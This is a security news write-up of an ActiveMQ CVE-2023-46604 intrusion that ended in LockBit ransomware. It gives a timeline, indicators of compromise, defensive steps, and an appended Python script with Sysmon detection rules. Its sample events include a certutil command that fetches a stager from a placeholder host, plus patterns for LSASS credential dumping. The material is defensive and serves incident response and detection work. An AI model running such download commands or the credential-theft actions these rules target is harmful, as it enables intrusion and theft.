Attackers Exploit CVE-2023-46604 ActiveMQ RCE for LockBit Ransomware in 19 Days


Threat actors exploited Apache ActiveMQ CVE-2023-46604 for initial access, ultimately deploying LockBit ransomware. The 19-day timeline spanned two intrusions, both through the same unpatched beachhead server. Service account credentials stolen during the first intrusion enabled rapid re-entry with domain admin privileges.

In mid-February 2024, an OpenWire command triggered a remote Java Spring XML payload. CertUtil downloaded a Metasploit stager that established C2 to 166.62.100.52 within 40 minutes. SYSTEM privileges were obtained, followed by LSASS credential dumping across four hosts.

The initial detection evicted the attackers on day two but left the vulnerable ActiveMQ instance unpatched. 18 days later the identical exploit re-entered, this time using the stolen service account credentials. Advanced IP Scanner, disguised as SoftPerfect, rapidly enumerated live hosts.

The LockBit executables LB3.exe and LB3_pass.exe were deployed via RDP to servers and workstations. On file servers they were run with path and password arguments; on other hosts they were double-clicked via Explorer. Ransom notes pointing to the Session messaging app indicated an independent operator using the LockBit Black builder.

Initial Access (Source – The DFIR Report)

Sysmon captured LSASS access with GrantedAccess 0x1010, confirming memory dumping. PowerShell payloads used layered string concatenation, Base64 and gzip obfuscation. VirtualAlloc/VirtualProtect shellcode loaders evaded signature detection on hosts where Defender was absent.

AnyDesk was installed silently as an autostart service to maintain persistence. An rdp.bat script opened port 3389 and then deleted itself six minutes later. Event logs were wiped, and SystemSettingsAdminFlows.exe was used to disable Defender on the Exchange server.

LSASS Credential Dumping Activity Observed in Sysmon Logs During Round 1 and Round 2 (Source – The DFIR Report)

Attack Timeline Table

Day | Action                         | Duration
0   | CVE-2023-46604 → Metasploit    | 40 minutes
1   | LSASS dump on 4 hosts          | Day 1
2   | Eviction (ActiveMQ unpatched)  | Day 2
20  | Re-entry → LockBit             | 419 hours total

AnyDesk Silent Installation and C2 Connection to 166.62.100[.]52 (Source – The DFIR Report)

IOCs Table

Type       | Indicator          | Description
IP         | 166.62.100.52      | C2/AnyDesk source
SHA256     | C8646CFB574FF2C6…  | LB3_pass.exe
SHA256     | 8CEEE89550C521BA…  | LB3.exe
SHA256     | 87BFB05057F21565…  | netscan.exe
AnyDesk ID | 1148037084         | Attacker client

The total time-to-ransomware was 419 hours, but on their return the same exploit gave the attackers access again within 90 minutes. A single unpatched gateway enabled complete network compromise.

Defensive Actions

  • Patch CVE-2023-46604 immediately
  • Enable Credential Guard to protect LSASS
  • Monitor Sysmon Event ID 10 for GrantedAccess 0x1010 on lsass.exe
  • Block unauthorized AnyDesk installs
  • Reset service account credentials after any intrusion
  • Deploy EDR across all endpoints
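As an added example that is not from the article or from The DFIR Report, the following Python script turns the detection points above (Sysmon Event ID 10 access to lsass.exe with the PROCESS_VM_READ bit set, of which the reported 0x1010 is one instance; connections to the listed C2 address; CertUtil used as a downloader; silent AnyDesk installation) into a small rule set and runs it over a handful of constructed Sysmon-style events. The process allow-list, the CertUtil and AnyDesk command-line patterns, and every sample event are assumptions made for illustration, not indicators taken from the report.

```python
"""Toy detection rules for the Sysmon signals discussed in the LockBit/ActiveMQ case.

Added example, not code from the article or The DFIR Report. Event field names
follow Sysmon's (EventID, SourceImage, TargetImage, GrantedAccess, Image,
CommandLine, DestinationIp); the sample events below are constructed.
"""
import re
from typing import Iterable

# Windows process access rights (documented PROCESS_* constants)
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
# The exact GrantedAccess value the article reports for the LSASS dumps
OBSERVED_LSASS_ACCESS = PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ  # 0x1010

# Indicator taken from the article's IOC table
C2_IPS = {"166.62.100.52"}

# Assumed allow-list of system processes that routinely open LSASS; tune per environment
LSASS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list[str]:
    """Return the names of the rules an event triggers (empty list if none)."""
    hits: list[str] = []
    eid = ev.get("EventID")
    cmd = ev.get("CommandLine", "")

    if eid == 10 and _basename(ev.get("TargetImage", "")) == "lsass.exe":
        # Event ID 10 = ProcessAccess. Any handle that can read LSASS memory
        # from a non-allow-listed process is suspicious; 0x1010 is the value seen here.
        granted = int(ev.get("GrantedAccess", "0x0"), 16)
        source = ev.get("SourceImage", "").lower()
        if granted & PROCESS_VM_READ and source not in LSASS_ALLOWLIST:
            hits.append("lsass_memory_read")

    elif eid == 3 and ev.get("DestinationIp") in C2_IPS:
        # Event ID 3 = NetworkConnect to a known C2 address
        hits.append("known_c2_ip")

    elif eid == 1:
        # Event ID 1 = ProcessCreate
        name = _basename(ev.get("Image", ""))
        # certutil fetching a URL is a classic living-off-the-land download
        if name == "certutil.exe" and re.search(r"-urlcache|https?://", cmd, re.IGNORECASE):
            hits.append("certutil_download")
        # Assumed command-line shape for a silent AnyDesk install
        if name == "anydesk.exe" and "install" in cmd.lower():
            hits.append("anydesk_install")
    return hits


def detect(events: Iterable[dict]) -> list[tuple[str, dict]]:
    """Run every rule over every event; returns (rule_name, event) pairs in order."""
    return [(rule, ev) for ev in events for rule in check_event(ev)]


# Constructed sample events (not real telemetry from the incident)
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",  # benign, allow-listed
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 3, "Image": r"C:\Users\Public\anydesk.exe",
     "DestinationIp": "166.62.100.52", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",  # URL is a placeholder
     "CommandLine": "certutil -urlcache -f http://example.invalid/stager.exe C:\\Users\\Public\\s.exe"},
    {"EventID": 1, "Image": r"C:\Users\Public\anydesk.exe",
     "CommandLine": "anydesk.exe --install C:\\ProgramData\\AnyDesk --silent"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",  # benign
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {ev}")
```

The LSASS rule keys on the PROCESS_VM_READ bit rather than the literal 0x1010 because a dumper can request a broader mask and still read memory; the allow-list keeps the rule quiet for the handful of system processes that open LSASS by design.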

ActiveMQ remains a persistent gateway vulnerability. A compromised service account bridges successive intrusion attempts indefinitely. The proliferation of the LockBit Black builder accelerates deployments by independent operators.

FAQ

What was the initial access vulnerability?

CVE-2023-46604, an Apache ActiveMQ RCE.

What was the total time to ransomware?

419 hours (19+ days).

What persistence mechanism was used?

AnyDesk installed as an autostart service.

Where did the re-entry credentials come from?

A privileged service account credential obtained from the LSASS dump.

Where did the ransom notes direct victims?

The Session private messaging app.
